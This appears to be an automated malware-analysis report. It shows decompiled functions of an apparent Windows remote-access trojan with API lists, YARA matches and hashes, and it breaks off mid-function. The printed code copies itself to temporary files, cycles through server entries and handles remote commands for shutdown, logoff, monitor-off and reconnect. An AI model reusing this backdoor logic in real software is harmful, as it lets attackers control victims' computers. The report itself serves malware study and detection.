                                    • Opcode Fuzzy Hash: de3c709328871596a5b821b1a49aa237f6efc18f58b709d848d978373845b7ee
                                    • Instruction Fuzzy Hash: 05F02770904144AFEF01DBF8DDA1D9EBBFCEB197147910AB9E40DE2AA4E7355F409A10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E24016C78(char __eax, void* __ebx, void* __eflags) {
                                    				char _v8;
                                    				struct _WIN32_FIND_DATAA _v328;
                                    				void* _t13;
                                    				intOrPtr _t23;
                                    				void* _t26;
                                    
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t26);
                                    				_push(0x24016cd5);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t26 + 0xfffffebc;
                                    				_t13 = FindFirstFileA(E24013534(_v8),  &_v328); // executed
                                    				if(_t13 != 0xffffffff) {
                                    					FindClose(_t13); // executed
                                    				}
                                    				_pop(_t23);
                                    				 *[fs:eax] = _t23;
                                    				_push(E24016CDC);
                                    				return E24013088( &_v8);
                                    			}


                                    0x24016c82
                                    0x24016c88
                                    0x24016c8f
                                    0x24016c90
                                    0x24016c95
                                    0x24016c98
                                    0x24016cad
                                    0x24016cb5
                                    0x24016cb8
                                    0x24016cbd
                                    0x24016cc1
                                    0x24016cc4
                                    0x24016cc7
                                    0x24016cd4

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 062e76dc98e69d1e638f4d2610c82567f71eb4193208c084b94691b4f4dd1aae
                                    • Instruction ID: 36a4090f36d61ff8f122dbd567bd5eb26343aefb42f931a39bf7abb1124a4575
                                    • Opcode Fuzzy Hash: 062e76dc98e69d1e638f4d2610c82567f71eb4193208c084b94691b4f4dd1aae
                                    • Instruction Fuzzy Hash: F6F02770900104AFEB01EBF8DD9199EB7FCEB1871479109B5E40CE2664E7306F409A10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E24016910(void* __eax, void* __ebx, void* __ecx) {
                                    				struct _SYSTEMTIME _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _t33;
                                    				void* _t34;
                                    				intOrPtr _t41;
                                    				void* _t47;
                                    
                                    				_t34 = __ecx;
                                    				_v28 = 0;
                                    				_v24 = 0;
                                    				_t33 = __eax;
                                    				_push(_t47);
                                    				_push(0x2401699e);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t47 + 0xffffffe8;
                                    				GetLocalTime( &_v20);
                                    				E240158BC( &_v24, _t34, 0, _v20.wHour & 0x0000ffff, 0);
                                    				if(E2401333C(_v24) != 1) {
                                    					E240158BC(_t33, _t34, 0, _v20.wHour & 0x0000ffff, 0);
                                    				} else {
                                    					E240158BC( &_v28, _t34, 0, _v20.wHour & 0x0000ffff, 0); // executed
                                    					E24013388(_t33, _v28, 0x240169b4);
                                    				}
                                    				_pop(_t41);
                                    				 *[fs:eax] = _t41;
                                    				_push(E240169A5);
                                    				return E240130AC( &_v28, 2);
                                    			}


                                    0x24016910
                                    0x24016919
                                    0x2401691c
                                    0x2401691f
                                    0x24016923
                                    0x24016924
                                    0x24016929
                                    0x2401692c
                                    0x24016933
                                    0x24016943
                                    0x24016951
                                    0x2401697e
                                    0x24016953
                                    0x2401695e
                                    0x2401696d
                                    0x2401696d
                                    0x24016985
                                    0x24016988
                                    0x2401698b
                                    0x2401699d

                                    APIs
                                    • GetLocalTime.KERNEL32(?,00000000,2401699E,?,00000000), ref: 24016933
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID:
                                    • API String ID: 481472006-0
                                    • Opcode ID: 924c4cdced7f427e2dd774ea5a0a08d5c92b05e449f30683f4ad69eab968a7f6
                                    • Instruction ID: d92e4c93ec7361fccff17d09113173e5b526b34984a92f08cf553826bfaabc06
                                    • Opcode Fuzzy Hash: 924c4cdced7f427e2dd774ea5a0a08d5c92b05e449f30683f4ad69eab968a7f6
                                    • Instruction Fuzzy Hash: 490144B0A042095BFB05DBA5CC519BFB6FDEFC8714B418439A408E6254E9349E808561
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E24018CD0(int __eax, char __ecx, int __edx) {
                                    				char _v16;
                                    				int _t4;
                                    				char _t5;
                                    				char _t6;
                                    
                                    				_push(__ecx);
                                    				_t6 = __ecx;
                                    				_t4 = GetLocaleInfoA(__eax, __edx,  &_v16, 2); // executed
                                    				if(_t4 <= 0) {
                                    					_t5 = _t6;
                                    				} else {
                                    					_t5 = _v16;
                                    				}
                                    				return _t5;
                                    			}


                                    0x24018cd3
                                    0x24018cd4
                                    0x24018ce3
                                    0x24018cea
                                    0x24018cf1
                                    0x24018cec
                                    0x24018cec
                                    0x24018cec
                                    0x24018cf7

                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,24018D23,00000000,24018D66,?,?,00000000,00000000), ref: 24018CE3
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: c0a5c38b77294cd5bc0105dacaac811761fc0667ac39b8f869ab3184c1b78c3f
                                    • Instruction ID: aa1f27ab185497e9081335c649769818a4f56c2750f4d0ddfdf6f1f28fc821f9
                                    • Opcode Fuzzy Hash: c0a5c38b77294cd5bc0105dacaac811761fc0667ac39b8f869ab3184c1b78c3f
                                    • Instruction Fuzzy Hash: B3D05E7731E2903AB210416A2D84EBB4ADCCBCA6A0F00407ABA4CC6200D2108D4AA3BA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E240384FC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				intOrPtr _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				void* _t139;
                                    				intOrPtr* _t140;
                                    				void* _t142;
                                    				intOrPtr* _t143;
                                    				intOrPtr* _t144;
                                    				void* _t155;
                                    				void** _t171;
                                    				intOrPtr* _t181;
                                    				void** _t182;
                                    				intOrPtr* _t194;
                                    				intOrPtr* _t202;
                                    				intOrPtr* _t203;
                                    				intOrPtr _t213;
                                    				intOrPtr _t216;
                                    				intOrPtr _t237;
                                    				intOrPtr _t286;
                                    				intOrPtr _t289;
                                    				intOrPtr* _t298;
                                    				intOrPtr* _t299;
                                    				intOrPtr _t302;
                                    				intOrPtr* _t304;
                                    				intOrPtr _t320;
                                    				void* _t322;
                                    				intOrPtr* _t355;
                                    				char* _t358;
                                    				intOrPtr* _t359;
                                    				intOrPtr* _t371;
                                    				intOrPtr* _t376;
                                    				CHAR* _t378;
                                    				int _t381;
                                    				intOrPtr* _t384;
                                    				void* _t386;
                                    				char* _t387;
                                    				char* _t388;
                                    				void* _t394;
                                    				void* _t399;
                                    				intOrPtr* _t448;
                                    				void* _t452;
                                    				intOrPtr _t453;
                                    				intOrPtr _t454;
                                    				intOrPtr _t458;
                                    				intOrPtr* _t464;
                                    				intOrPtr* _t495;
                                    				intOrPtr _t503;
                                    				intOrPtr _t504;
                                    				intOrPtr _t507;
                                    				intOrPtr _t522;
                                    				intOrPtr _t523;
                                    				void* _t556;
                                    
                                    				_t556 = __fp0;
                                    				_t520 = __esi;
                                    				_t519 = __edi;
                                    				_t393 = __ebx;
                                    				_t522 = _t523;
                                    				_t394 = 0xc;
                                    				goto L1;
                                    				do {
                                    					L4:
                                    					_t140 =  *0x2405ac40; // 0x2405b970
                                    					_t142 = E24016C78( *_t140, _t393, _t525); // executed
                                    					if(_t142 == 0) {
                                    						_t388 =  *0x2405ab48; // 0x240570d4
                                    						 *_t388 = 0;
                                    					}
                                    					_t143 =  *0x2405abf8; // 0x2405b96c
                                    					_t527 =  *_t143;
                                    					if( *_t143 == 0) {
                                    						L15:
                                    						_t144 =  *0x2405abf8; // 0x2405b96c
                                    						__eflags =  *_t144;
                                    						if(__eflags != 0) {
                                    							_t355 =  *0x2405ac40; // 0x2405b970
                                    							__eflags = E24016C78( *_t355, _t393, __eflags) - 1;
                                    							if(__eflags == 0) {
                                    								_t358 =  *0x2405ab48; // 0x240570d4
                                    								 *_t358 = 1;
                                    							}
                                    						}
                                    						L18:
                                    						E24016634(_v24, _t393, _t519, _t520, _t532); // executed
                                    						E24016910( &_v56, _t393, _t395); // executed
                                    						_push(_v56);
                                    						_push(0x24038dfc);
                                    						E240169B8( &_v60, _t393, _t395);
                                    						_push(_v60);
                                    						_push(0x24038dfc);
                                    						E24016A60( &_v64, _t393, _t395); // executed
                                    						_push(_v64);
                                    						E240133FC();
                                    						_t155 = E24016C78(_v24, _t393, _t532); // executed
                                    						_t533 = _t155;
                                    						if(_t155 == 0) {
                                    							E24016DA0(_v24, _t393, E2401333C(_v28), _v28, _t520, _t533); // executed
                                    						}
                                    						Sleep(0x1388); // executed
                                    						if( *0x2405ca50 != 0) {
                                    							E24013120( &_v16,  *0x2405ca50);
                                    							E24013088(0x2405ca50);
                                    							__eflags = E24013674(0x24038dfc, _v16) - 1;
                                    							E24013590(_v16, E24013674(0x24038dfc, _v16) - 1, 1,  &_v8);
                                    							E240135D0( &_v16, E24013674(0x24038dfc, _v16), 1);
                                    							_v12 = E240158F0(_v16, __eflags);
                                    							goto L34;
                                    						} else {
                                    							 *0x2405ca58 =  *0x2405ca58 + 1;
                                    							if( *0x2405ca58 >  *0x2405ca54) {
                                    								 *0x2405ca58 = 0;
                                    							}
                                    							_t504 =  *0x2405ab80; // 0x2405b888
                                    							E24013120( &_v16,  *((intOrPtr*)(_t504 +  *0x2405ca58 * 4)));
                                    							_t537 = _v16;
                                    							if(_v16 == 0) {
                                    								E24013088( &_v8);
                                    							} else {
                                    								E24013590(_v16, E24013674(0x24038dfc, _v16) - 1, 1,  &_v8);
                                    								E240135D0( &_v16, E24013674(0x24038dfc, _v16), 1);
                                    								_v12 = E240158F0(_v16, _t537);
                                    							}
                                    							while(_v8 == 0) {
                                    								Sleep(0x32);
                                    								 *0x2405ca58 =  *0x2405ca58 + 1;
                                    								__eflags =  *0x2405ca58 -  *0x2405ca54;
                                    								if( *0x2405ca58 >  *0x2405ca54) {
                                    									__eflags = 0;
                                    									 *0x2405ca58 = 0;
                                    								}
                                    								_t320 =  *0x2405ab80; // 0x2405b888
                                    								_t322 = E2401333C( *((intOrPtr*)(_t320 +  *0x2405ca58 * 4)));
                                    								__eflags = _t322 - 9;
                                    								if(_t322 < 9) {
                                    									E24013088( &_v8);
                                    								} else {
                                    									_t507 =  *0x2405ab80; // 0x2405b888
                                    									E24013120( &_v16,  *((intOrPtr*)(_t507 +  *0x2405ca58 * 4)));
                                    									E24013590(_v16, E24013674(0x24038dfc, _v16) - 1, 1,  &_v8);
                                    									E240135D0( &_v16, E24013674(0x24038dfc, _v16), 1);
                                    									_v12 = E240158F0(_v16, __eflags);
                                    								}
                                    							}
                                    							L34:
                                    							if(_v8 != 0) {
                                    								_push(_t522);
                                    								_push(0x24038916);
                                    								_push( *[fs:eax]);
                                    								 *[fs:eax] = _t523;
                                    								if( *0x2405ca4c != 0) {
                                    									E24012688( *0x2405ca4c);
                                    								}
                                    								if( *0x2405ca4c != 0) {
                                    									 *0x2405ca4c = 0;
                                    								}
                                    								 *0x2405ca4c = E24012658(1);
                                    								_pop(_t503);
                                    								 *[fs:eax] = _t503;
                                    							}
                                    							_t543 =  *0x2405ca4c;
                                    							if( *0x2405ca4c == 0) {
                                    								L68:
                                    								_t171 =  *0x2405abfc; // 0x2405b99c
                                    								CloseHandle( *_t171);
                                    								_t448 =  *0x2405ac14; // 0x2405b94c
                                    								_t395 = 0x24038f10;
                                    								E24013388( &_v104, 0x24038f10,  *_t448);
                                    								_t393 = E24014F18(0, 0, E24013534(_v104));
                                    								if(GetLastError() != 0xb7) {
                                    									goto L70;
                                    								}
                                    								CloseHandle(_t393);
                                    								L74:
                                    								_pop(_t454);
                                    								 *[fs:eax] = _t454;
                                    								_push(0x24038ddc);
                                    								E240130AC( &_v104, 0x17);
                                    								return E24013088( &_v8);
                                    							} else {
                                    								Sleep(0x64); // executed
                                    								_push(_t522);
                                    								_push(0x24038989);
                                    								_push( *[fs:eax]);
                                    								 *[fs:eax] = _t523;
                                    								 *0x2405ca5c = GetTickCount();
                                    								E24022908( *0x2405ca4c, _t393, _v12, _v8, _t519, _t520, _t543);
                                    								_pop(_t458);
                                    								 *[fs:eax] = _t458;
                                    								if( *0x2405ca4c != 0 &&  *((char*)( *0x2405ca4c + 0x10)) == 1) {
                                    									Sleep(0xa);
                                    									_t202 =  *0x2405ab44; // 0x2405b974
                                    									if( *_t202 != 0) {
                                    										_t298 =  *0x2405ac44; // 0x240572fc
                                    										_t547 =  *_t298;
                                    										if( *_t298 == 0) {
                                    											_t299 =  *0x2405ab44; // 0x2405b974
                                    											E24024720( *_t299, _t393,  &_v68, "njkvenknvjebcddlaknvfdvjkfdskv", _t519, _t520, _t547);
                                    											_t302 =  *0x2405ab44; // 0x2405b974
                                    											E240130DC(_t302, _v68);
                                    											_t304 =  *0x2405ab44; // 0x2405b974
                                    											E2402E9EC( *_t304, _t393, _t519, _t520, _t547, _t556);
                                    										}
                                    									}
                                    									_t203 =  *0x2405abb0; // 0x2405b8dc
                                    									_push( *_t203);
                                    									_push(0x24038e40);
                                    									_push(0x24038e4c);
                                    									E240133FC();
                                    									E24038F28( *0x2405ca4c, _t393, _v72, _t519, _t520, _t547);
                                    									while( *((char*)( *0x2405ca4c + 0x10)) == 1 &&  *0x2405ca50 == 0) {
                                    										E24016DA0(_v24, _t393, 0, 0, _t520, __eflags);
                                    										E24016634(_v24, _t393, _t519, _t520, __eflags);
                                    										E24022B84( *0x2405ca4c, 0);
                                    										E24013088( &_v20);
                                    										E240395F4( *0x2405ca4c, _t393,  &_v20, _t519, _t520);
                                    										__eflags = _v20;
                                    										if(__eflags == 0) {
                                    											continue;
                                    										}
                                    										__eflags = E24013674(0x24038e40, _v20) - 1;
                                    										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v76);
                                    										E24013480(_v76, "myshutdown");
                                    										if(__eflags == 0) {
                                    											L55:
                                    											_t237 =  *0x2405ac34; // 0x2406324c
                                    											E240130DC(_t237, _v20);
                                    											L24044A34(_t393, _t519, _t520, _t556);
                                    											continue;
                                    										}
                                    										__eflags = E24013674(0x24038e40, _v20) - 1;
                                    										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v80);
                                    										E24013480(_v80, "hibernar");
                                    										if(__eflags == 0) {
                                    											goto L55;
                                    										}
                                    										__eflags = E24013674(0x24038e40, _v20) - 1;
                                    										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v84);
                                    										E24013480(_v84, "logoff");
                                    										if(__eflags == 0) {
                                    											goto L55;
                                    										}
                                    										__eflags = E24013674(0x24038e40, _v20) - 1;
                                    										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v88);
                                    										E24013480(_v88, "poweroff");
                                    										if(__eflags == 0) {
                                    											goto L55;
                                    										}
                                    										__eflags = E24013674(0x24038e40, _v20) - 1;
                                    										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v92);
                                    										E24013480(_v92, "myrestart");
                                    										if(__eflags == 0) {
                                    											goto L55;
                                    										}
                                    										__eflags = E24013674(0x24038e40, _v20) - 1;
                                    										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v96);
                                    										E24013480(_v96, "desligarmonitor");
                                    										if(__eflags != 0) {
                                    											__eflags = E24013674(0x24038e40, _v20) - 1;
                                    											E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v100);
                                    											E24013480(_v100, "reconnect");
                                    											if(__eflags != 0) {
                                    												__eflags = _v20;
                                    												if(__eflags != 0) {
                                    													__eflags = E24013674(0x24038e40, _v20);
                                    													if(__eflags > 0) {
                                    														E24022D34( *0x2405ca4c, 0x24038ee4);
                                    														_t286 =  *0x2405ac34; // 0x2406324c
                                    														E240130DC(_t286, _v20);
                                    														__eflags = 0;
                                    														_t289 = E240178C8(L24044A34, 0, 0);
                                    														_t495 =  *0x2405abdc; // 0x24063254
                                    														 *_t495 = _t289;
                                    													}
                                    												}
                                    											} else {
                                    												E240135D0( &_v20, E24013674(0x24038e40, _v20), 1);
                                    												E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1, 0x2405ca50);
                                    											}
                                    											continue;
                                    										}
                                    										goto L55;
                                    									}
                                    									E24022638(0x24038ef0, _t393, _t520);
                                    									if( *((char*)( *0x2405ca4c + 0x10)) == 1) {
                                    										 *((intOrPtr*)( *((intOrPtr*)( *0x2405ca4c)) - 4))();
                                    									}
                                    									if( *0x2405ca4c != 0) {
                                    										 *0x2405ca4c = 0;
                                    									}
                                    									E24013120( &_v20, "audiostop|");
                                    									_t213 =  *0x2405ac34; // 0x2406324c
                                    									E240130DC(_t213, _v20);
                                    									_t216 = E240178C8(L24044A34, 0, 0);
                                    									_t464 =  *0x2405abdc; // 0x24063254
                                    									 *_t464 = _t216;
                                    								}
                                    								goto L68;
                                    							}
                                    						}
                                    					}
                                    					_t359 =  *0x2405ac40; // 0x2405b970
                                    					if(E24016C78( *_t359, _t393, _t527) != 0) {
                                    						goto L15;
                                    					}
                                    					E24017038( &_v48);
                                    					_push(_v48);
                                    					E240158BC( &_v52, _t395, 0, GetTickCount(), 0);
                                    					_push(_v52);
                                    					_push(".tmp");
                                    					E240133FC();
                                    					_push(_t522);
                                    					_push(0x2403867f);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t523;
                                    					_push(0);
                                    					_push(0);
                                    					_push(E24013534(_v16));
                                    					_t371 =  *0x2405abf8; // 0x2405b96c
                                    					_t452 = E24013534( *_t371);
                                    					_pop(_t399);
                                    					E240161A0(0, _t393, _t399, _t452, _t520);
                                    					_t376 =  *0x2405ac40; // 0x2405b970
                                    					_t378 = E24013534( *_t376);
                                    					_t381 = CopyFileA(E24013534(_v16), _t378, 0);
                                    					asm("sbb eax, eax");
                                    					_t530 = _t381 + 1 - 1;
                                    					if(_t381 + 1 != 1) {
                                    						L14:
                                    						_pop(_t453);
                                    						_pop(_t395);
                                    						 *[fs:eax] = _t453;
                                    						goto L18;
                                    					}
                                    					_t384 =  *0x2405ac40; // 0x2405b970
                                    					_t386 = E24016438( *_t384, _t393, _t399, _t530);
                                    					if(_t452 != 0) {
                                    						if(__eflags <= 0) {
                                    							goto L14;
                                    						}
                                    						L13:
                                    						_t387 =  *0x2405ab48; // 0x240570d4
                                    						 *_t387 = 1;
                                    						goto L14;
                                    					}
                                    					_t532 = _t386 - 0x186a0;
                                    					if(_t386 <= 0x186a0) {
                                    						goto L14;
                                    					} else {
                                    						goto L13;
                                    					}
                                    					L70:
                                    					CloseHandle(_t393);
                                    					_t181 =  *0x2405ab28; // 0x2405aa88
                                    					__eflags =  *_t181;
                                    					if(__eflags != 0) {
                                    						E24037CD4(0x24038f20, __eflags);
                                    						Sleep(0x64);
                                    						E24037CD4(0, __eflags);
                                    						_t194 =  *0x2405ab28; // 0x2405aa88
                                    						__eflags = 0;
                                    						 *_t194 = 0;
                                    					}
                                    					__eflags =  *0x2405aa50 - 1;
                                    				} while (__eflags != 0);
                                    				_t182 =  *0x2405abe4; // 0x2405b998
                                    				CloseHandle( *_t182);
                                    				goto L74;
                                    				L1:
                                    				_push(0);
                                    				_push(0);
                                    				_t394 = _t394 - 1;
                                    				_t524 = _t394;
                                    				if(_t394 != 0) {
                                    					goto L1;
                                    				} else {
                                    					_push(_t394);
                                    					_push(__ebx);
                                    					_push(__esi);
                                    					_push(__edi);
                                    					_push(_t522);
                                    					_push(0x24038dd5);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t523;
                                    					E24017038( &_v32);
                                    					_t395 = "UuU.uUu";
                                    					E24013388( &_v24, "UuU.uUu", _v32);
                                    					E24016910( &_v36, __ebx, "UuU.uUu"); // executed
                                    					_push(_v36);
                                    					_push(0x24038dfc);
                                    					E240169B8( &_v40, __ebx, "UuU.uUu");
                                    					_push(_v40);
                                    					_push(0x24038dfc);
                                    					E24016A60( &_v44, _t393, _t395);
                                    					_push(_v44);
                                    					E240133FC();
                                    					_t139 = E24016C78(_v24, _t393, _t524); // executed
                                    					_t525 = _t139;
                                    					if(_t139 == 0) {
                                    						_t395 = E2401333C(_v28);
                                    						E24016DA0(_v24, _t393, _t390, _v28, __esi, _t525);
                                    					}
                                    					goto L4;
                                    				}
                                    			}
                                    (Instruction address column for the decompiled function above, 0x240384fc to 0x24038dd4, separated from its code lines during extraction.)
                                    0x2403850e
                                    0x24038511
                                    0x24038512
                                    0x24038517
                                    0x2403851a
                                    0x24038520
                                    0x2403852b
                                    0x24038530
                                    0x24038538
                                    0x2403853d
                                    0x24038540
                                    0x24038548
                                    0x2403854d
                                    0x24038550
                                    0x24038558
                                    0x2403855d
                                    0x24038568
                                    0x24038570
                                    0x24038575
                                    0x24038577
                                    0x24038581
                                    0x24038589
                                    0x24038589
                                    0x00000000
                                    0x24038577

                                    APIs
                                    • GetTickCount.KERNEL32 ref: 240385D3
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24038642
                                    • Sleep.KERNEL32(00001388,?,24038DFC,?,24038DFC,?,?,24038DFC,?,24038DFC,?,00000000,24038DD5), ref: 24038713
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CopyCountFileSleepTick
                                    • String ID: .tmp$UuU.uUu$_SAIR$audiostop|$desligarmonitor$exit$hibernar$logoff$myrestart$myshutdown$njkvenknvjebcddlaknvfdvjkfdskv$poweroff$reconnect
                                    • API String ID: 3875903300-1445509685
                                    • Opcode ID: 2da9e32bb0d5d479e3ffeec1db929eecc612ea1d8821e7ea5debf371e89e6929
                                    • Instruction ID: 856d1dc70ec2ebdc0f14a73e89c4e0620dc8ae04097a81700b6a1c4dddd281dd
                                    • Opcode Fuzzy Hash: 2da9e32bb0d5d479e3ffeec1db929eecc612ea1d8821e7ea5debf371e89e6929
                                    • Instruction Fuzzy Hash: 31320C35A041099FFF01DFA8C880A9E7FFAFB58308F5084B5E508A7259DB78ADC58B55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E240166E4(void* __eax, char* __ecx, char* __edx, int _a4, char* _a8, char* _a12) {
                                    				void* _t7;
                                    				void* _t8;
                                    				char* _t14;
                                    				char* _t15;
                                    
                                    				_t14 = __ecx;
                                    				_t15 = __edx;
                                    				_t8 = __eax;
                                    				GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
                                    				_t7 = ShellExecuteA(_t8, _t15, _t14, _a12, _a8, _a4); // executed
                                    				return _t7;
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000,2404E32C,2404E184,?,2404E184,?,?,2404E2A0), ref: 240166FA
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 24016700
                                    • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,?,?,00000000,shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000), ref: 24016714
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressExecuteLibraryLoadProcShell
                                    • String ID: ShellExecuteA$open$shell32.dll
                                    • API String ID: 3429701994-209507969
                                    • Opcode ID: df8b7060bf0a9b7f67e06e0d77e6a2326738ff75f58f97e36d14c9d1b9d425e7
                                    • Instruction ID: 1f4370a304c284cdd6ae91da79a8f23773aced1cdf96bb1c831f3774e499855a
                                    • Opcode Fuzzy Hash: df8b7060bf0a9b7f67e06e0d77e6a2326738ff75f58f97e36d14c9d1b9d425e7
                                    • Instruction Fuzzy Hash: 54E08C722002083B6310DADB9C80EAFBBADEFD9AA0310C52AB60CC7208D4309E4186F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E240382AC() {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				intOrPtr _v80;
                                    				void* _t34;
                                    				void* _t51;
                                    				void* _t65;
                                    				long _t66;
                                    				void* _t70;
                                    				void* _t90;
                                    				void* _t91;
                                    				intOrPtr _t105;
                                    				void* _t109;
                                    				void* _t110;
                                    				intOrPtr* _t112;
                                    
                                    				_t91 = 5;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t91 = _t91 - 1;
                                    				} while (_t91 != 0);
                                    				_push(_t110);
                                    				_push(_t109);
                                    				_t90 =  *0x2405ab9c; // 0x2405b9c4
                                    				_push(0x240384a4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t112;
                                    				while(1) {
                                    					_t34 = E2401333C( *_t90);
                                    					_t114 = _t34 - 0x2710;
                                    					if(_t34 >= 0x2710) {
                                    						break;
                                    					}
                                    					E24013344(_t90, "XXXXXXXXXXXXXXXXXXXX");
                                    				}
                                    				E24013088(0x2405ca50);
                                    				E24017038( &_v20);
                                    				_t92 = "XxX.xXx";
                                    				E24013388( &_v12, "XxX.xXx", _v20);
                                    				E24016910( &_v24, _t90, "XxX.xXx");
                                    				_push(_v24);
                                    				_push(0x240384ec);
                                    				E240169B8( &_v28, _t90, _t92);
                                    				_push(_v28);
                                    				_push(0x240384ec);
                                    				E24016A60( &_v32, _t90, _t92);
                                    				_push(_v32);
                                    				E240133FC();
                                    				_t51 = E24016C78(_v12, _t90, _t114); // executed
                                    				_t115 = _t51;
                                    				if(_t51 == 0) {
                                    					E24016DA0(_v12, _t90, E2401333C(_v16), _v16, _t110, _t115); // executed
                                    				}
                                    				_t93 = 0;
                                    				_t116 = 0;
                                    				_v8 = E240178C8(E240384FC, 0, 0);
                                    				Sleep(0x2710); // executed
                                    				while(1) {
                                    					L8:
                                    					E24038298();
                                    					E24016910( &_v36, _t90, _t93);
                                    					_push(_v36);
                                    					_push(0x240384ec);
                                    					E240169B8( &_v40, _t90, _t93);
                                    					_push(_v40);
                                    					_push(0x240384ec);
                                    					E24016A60( &_v44, _t90, _t93);
                                    					_push(_v44);
                                    					E240133FC();
                                    					E24016634(_v12, _t90, _t109, _t110, _t116); // executed
                                    					_t65 = E24016C78(_v12, _t90, _t116); // executed
                                    					_t117 = _t65;
                                    					if(_t65 == 0) {
                                    						_t93 = E2401333C(_v16);
                                    						E24016DA0(_v12, _t90, _t82, _v16, _t110, _t117); // executed
                                    					}
                                    					if( *0x2405ca4c == 0) {
                                    						continue;
                                    					}
                                    					L11:
                                    					_t66 = GetTickCount();
                                    					_push(0);
                                    					_push(_t66);
                                    					_t70 =  *0x2405ca5c + 0x19a28;
                                    					asm("cdq");
                                    					if(0 != _v80) {
                                    						L14:
                                    						if(__eflags >= 0) {
                                    							continue;
                                    							do {
                                    								do {
                                    									do {
                                    										goto L8;
                                    									} while ( *0x2405ca4c == 0);
                                    									goto L11;
                                    								} while (__eflags >= 0);
                                    								goto L15;
                                    							} while (_t70 >=  *_t112);
                                    						}
                                    						L15:
                                    						_push(_t111);
                                    						_push(0x2403847a);
                                    						_push( *[fs:eax]);
                                    						 *[fs:eax] = _t112;
                                    						E24022638(0x240384f8, _t90, _t110);
                                    						_t116 = _v8;
                                    						if(_v8 != 0) {
